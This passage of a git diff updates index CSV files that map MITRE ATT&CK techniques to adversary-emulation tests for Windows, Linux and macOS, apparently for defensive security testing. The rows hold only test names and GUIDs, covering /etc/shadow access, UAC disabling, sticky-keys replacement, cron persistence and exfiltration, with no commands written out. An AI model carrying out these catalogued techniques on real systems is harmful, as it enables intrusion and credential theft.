folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash @@ -152,6 +159,7 @@ persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh @@ -166,6 +174,8 @@ persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6 persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell +credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash +credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash @@ -230,6 +240,7 @@ defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelpe defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell @@ -423,6 +434,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh @@ -457,7 +469,8 @@ defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token d defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt -defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt @@ -592,6 +605,7 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt +discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh @@ -606,7 +620,8 @@ execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2 execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt execution,T1559.002,Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual @@ -736,5 +751,6 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d20d8e79..5e0d0cf0 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -3,7 +3,8 @@ privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_ privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash @@ -22,7 +23,8 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash @@ -31,6 +33,8 @@ persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash +credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash @@ -149,7 +153,8 @@ collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 54e2c7eb..099d86f8 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -2,7 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash @@ -27,7 +27,7 @@ persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash @@ -127,7 +127,7 @@ discovery,T1049,System Network Connections Discovery,3,System Network Connection discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash execution,T1569.001,Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash execution,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 76e517a5..6e04db29 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1,5 +1,6 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell @@ -13,6 +14,7 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell @@ -46,6 +48,7 @@ privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell @@ -69,6 +72,7 @@ defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelpe defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell @@ -205,6 +209,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - Execute arbitrary PowerShell code,d590097e-d402-44e2-ad72-2c6aa1ce78b1,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt @@ -222,12 +227,14 @@ defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token d defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt -defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt @@ -252,6 +259,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt +persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt @@ -275,6 +283,7 @@ persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell @@ 